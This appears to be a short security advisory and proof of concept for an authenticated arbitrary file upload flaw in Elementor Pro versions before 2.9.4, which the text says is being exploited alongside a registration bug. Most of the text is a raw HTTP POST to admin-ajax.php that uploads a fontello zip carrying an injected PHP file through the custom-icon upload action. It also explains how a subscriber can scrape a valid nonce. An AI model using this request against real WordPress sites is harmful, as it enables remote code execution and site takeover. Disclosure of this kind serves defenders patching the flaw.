Elementor Pro < 2.9.4 - Authenticated Arbitrary File Upload

According to Jerome Bruandet, from NintechNet, the vulnerability, currently exploited by attackers, allows any logged-in user to upload and execute PHP scripts on the blog. Chloe Chamberland from Wordfence also confirmed the issue and added that “This vulnerability is being used in conjunction with a vulnerability in Ultimate Addons for Elementor that allows for subscriber registration.”

PoC

The following is a sample post where zip_upload can contain a fontello generated zip file with an injected php file. A legitimate nonce can be scraped from the page source of /wp-admin once authenticated as a subscriber for the _nonce field. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: Content-Length: 38005 Accept: application/json, text/javascript, /; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryczB4AfBdfz6AZDaF Origin: http://elementorvuln.vhx.cloud:8080 Referer: [url]/wp-admin/post-new.php?post_type=elementor_icons Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Connection: close ------WebKitFormBoundaryczB4AfBdfz6AZDaF Content-Disposition: form-data; name=“zip_upload”; filename=“fontello-c6dc39d0.zip” Content-Type: application/zip omitted this for brevity* ------WebKitFormBoundaryczB4AfBdfz6AZDaF Content-Disposition: form-data; name=“actions” {“pro_assets_manager_custom_icon_upload”:{“action”:“pro_assets_manager_custom_icon_upload”,“data”:{“post_id”:“1”}}} ------WebKitFormBoundaryczB4AfBdfz6AZDaF Content-Disposition: form-data; name=“_nonce” 5052d6f053 ------WebKitFormBoundaryczB4AfBdfz6AZDaF Content-Disposition: form-data; name=“action” elementor_ajax ------WebKitFormBoundaryczB4AfBdfz6AZDaF———